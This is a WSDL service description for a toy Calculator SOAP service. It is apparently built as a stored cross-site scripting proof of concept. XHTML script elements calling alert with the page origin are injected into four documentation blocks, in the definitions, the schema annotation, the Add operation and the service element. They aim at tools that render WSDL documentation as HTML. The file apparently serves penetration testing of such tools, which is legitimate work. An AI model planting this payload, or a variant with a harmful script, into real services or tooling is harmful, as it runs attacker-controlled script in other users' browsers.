xss-wsdl.wsdl

<?xml version="1.0" encoding="UTF-8"?>
<definitions name="Calculator"
             targetNamespace="http://example.com/calculator"
             xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
             xmlns:tns="http://example.com/calculator"
             xmlns:xsd="http://www.w3.org/2001/XMLSchema"
             xmlns:a="http://www.w3.org/1999/xhtml">

  <documentation>
    <a:script>alert("Stored XSS em: " + origin)</a:script>
  </documentation>

  <types>
    <xsd:schema targetNamespace="http://example.com/calculator">
      <xsd:element name="Add">
        <xsd:annotation>
          <xsd:documentation>
            <a:script>alert("Stored XSS em: " + origin)</a:script>
          </xsd:documentation>
        </xsd:annotation>
        <xsd:complexType>
          <xsd:sequence>
            <xsd:element name="a" type="xsd:int"/>
            <xsd:element name="b" type="xsd:int"/>
          </xsd:sequence>
        </xsd:complexType>
      </xsd:element>
      <xsd:element name="AddResponse">
        <xsd:complexType>
          <xsd:sequence>
            <xsd:element name="result" type="xsd:int"/>
          </xsd:sequence>
        </xsd:complexType>
      </xsd:element>
    </xsd:schema>
  </types>

  <message name="AddRequest">
    <part name="parameters" element="tns:Add"/>
  </message>
  <message name="AddResponse">
    <part name="result" element="tns:AddResponse"/>
  </message>

  <portType name="CalculatorPortType">
    <operation name="Add">
      <documentation>
        <a:script>alert("Stored XSS em: " + origin)</a:script>
      </documentation>
      <input message="tns:AddRequest"/>
      <output message="tns:AddResponse"/>
    </operation>
  </portType>

  <binding name="CalculatorSoapBinding" type="tns:CalculatorPortType">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="Add">
      <soap:operation soapAction="http://example.com/calculator/Add"/>
      <input>
        <soap:body use="literal"/>
      </input>
      <output>
        <soap:body use="literal"/>
      </output>
    </operation>
  </binding>

  <service name="CalculatorService">
    <documentation>
      <a:script>alert("Stored XSS em: " + origin)</a:script>
    </documentation>
    <port name="CalculatorPort" binding="tns:CalculatorSoapBinding">
      <soap:address location="http://example.com/calculator/service"/>
    </port>
  </service>

</definitions>
